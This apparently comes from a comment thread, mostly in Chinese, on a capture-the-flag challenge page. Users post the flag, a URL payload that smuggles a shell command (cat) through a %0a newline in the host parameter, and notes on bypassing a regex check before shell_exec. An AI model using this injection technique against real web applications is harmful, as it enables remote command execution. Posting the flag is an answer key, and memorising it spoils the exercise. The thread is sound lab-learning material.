shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕
在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
Half the truth is often a big lie: thisistheflagwithrandomstuffthatyouwontguessJUSTCATSHE
空格被过滤了 用%20绕过
抓包,发现/query.php能看源码,是RCE。 有正则过滤,用换行符的编码%0a来截断第一个参数即可。用第二个参数执行任意命令, ls查看文件列表,cat查看文件内容。
playload 怎么构造呢
flag 文件名字是什么
有点理解不了
...
评论
xzs297995 10天前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
xiaoxiao972521 16天前
举报
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
15614005380 2月前
举报
1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕
unknown237819 3月前
举报
在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令
868954104 4月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
vchopin 4月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
yituoshi 5月前
举报
Half the truth is often a big lie: thisistheflagwithrandomstuffthatyouwontguessJUSTCATSHE
1959272171 6月前
举报
空格被过滤了 用%20绕过
justsosoloveyou 6月前
举报
抓包,发现/query.php能看源码,是RCE。 有正则过滤,用换行符的编码%0a来截断第一个参数即可。用第二个参数执行任意命令, ls查看文件列表,cat查看文件内容。
宇宙无敌靓仔 4月前
举报
playload 怎么构造呢
qingfeng1115 4月前
举报
flag 文件名字是什么
wclc 6月前
举报
有点理解不了